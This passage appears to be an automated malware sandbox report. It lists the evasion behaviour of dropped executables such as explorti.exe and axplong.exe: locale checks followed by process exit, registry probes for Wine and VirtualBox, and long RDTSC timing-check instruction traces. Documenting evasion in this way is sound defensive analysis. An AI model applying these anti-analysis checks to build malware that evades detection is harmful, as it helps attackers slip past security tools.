Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F26 second address: 544F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 jc 00007F95FD07A056h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F35 second address: 544F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F4F second address: 544F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544F55 second address: 544F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 544009 second address: 54400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 535045 second address: 535061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007F95FD7D89A1h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5441FE second address: 544219 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD07A061h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546ED2 second address: 546EFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F95FD7D89A7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F95FD7D8998h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546EFD second address: 546F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 546F7E second address: 546F84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5471F2 second address: 547205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547205 second address: 54721E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnl 00007F95FD7D8996h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F95FD7D8996h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54721E second address: 547228 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547228 second address: 54722D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54722D second address: 547254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F95FD07A056h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F95FD07A060h 0x00000018 pop ecx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547254 second address: 54727E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F95FD7D89A4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 54727E second address: 5472DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F95FD07A058h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 jng 00007F95FD07A05Ah 0x00000027 mov cx, 7E24h 0x0000002b lea ebx, dword ptr [ebp+1244BDE2h] 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F95FD07A058h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472DD second address: 5472E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472E1 second address: 5472E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5472E5 second address: 5472EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 547492 second address: 547496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 559525 second address: 55952F instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55952F second address: 559535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 566B02 second address: 566B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 566B06 second address: 566B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53F105 second address: 53F123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F95FD7D899Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53F123 second address: 53F12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565126 second address: 56512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565241 second address: 565245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565245 second address: 56525D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56525D second address: 565263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565263 second address: 565269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565269 second address: 56526D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565A9E second address: 565AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F95FD7D8996h 0x0000000f je 00007F95FD7D8996h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565AB3 second address: 565AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E2ED second address: 55E2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E2F1 second address: 55E310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95FD07A056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F95FD07A05Ch 0x00000012 jbe 00007F95FD07A056h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E310 second address: 55E314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E314 second address: 55E31E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 55E31E second address: 55E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5319F5 second address: 5319FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5319FB second address: 531A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F95FD7D89A0h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 531A17 second address: 531A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 565C40 second address: 565C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95FD7D8996h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56631F second address: 566323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5668EC second address: 56690B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F95FD7D89A8h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56A2F2 second address: 56A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56A2F8 second address: 56A334 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95FD7D899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F95FD7D89A1h 0x00000010 jg 00007F95FD7D89A2h 0x00000016 je 00007F95FD7D899Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53A0D3 second address: 53A132 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F95FD07A056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F95FD07A069h 0x00000011 jmp 00007F95FD07A05Dh 0x00000016 push edi 0x00000017 jmp 00007F95FD07A05Eh 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F95FD07A066h 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56DCF6 second address: 56DD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E315 second address: 56E31A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E31A second address: 56E32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E32A second address: 56E355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jnl 00007F95FD07A056h 0x00000012 jnp 00007F95FD07A056h 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c ja 00007F95FD07A056h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E355 second address: 56E35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 56E35A second address: 56E387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F95FD07A063h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 573121 second address: 57314F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95FD7D89A0h 0x0000000b jmp 00007F95FD7D89A0h 0x00000010 jo 00007F95FD7D899Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57341C second address: 573448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A05Ah 0x00000009 jno 00007F95FD07A06Ah 0x0000000f push ebx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 573448 second address: 57344E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57358E second address: 573594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739A0 second address: 5739A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739A9 second address: 5739AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739AD second address: 5739B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5739B3 second address: 5739BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D06 second address: 574D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D0A second address: 574D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D10 second address: 574D59 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95FD7D8998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007F95FD7D89A9h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jl 00007F95FD7D89BEh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F95FD7D89A5h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D59 second address: 574D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D71 second address: 574D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D75 second address: 574D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F95FD07A05Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574D8A second address: 574D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 574EC5 second address: 574EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5754BC second address: 5754C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5758BD second address: 5758CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
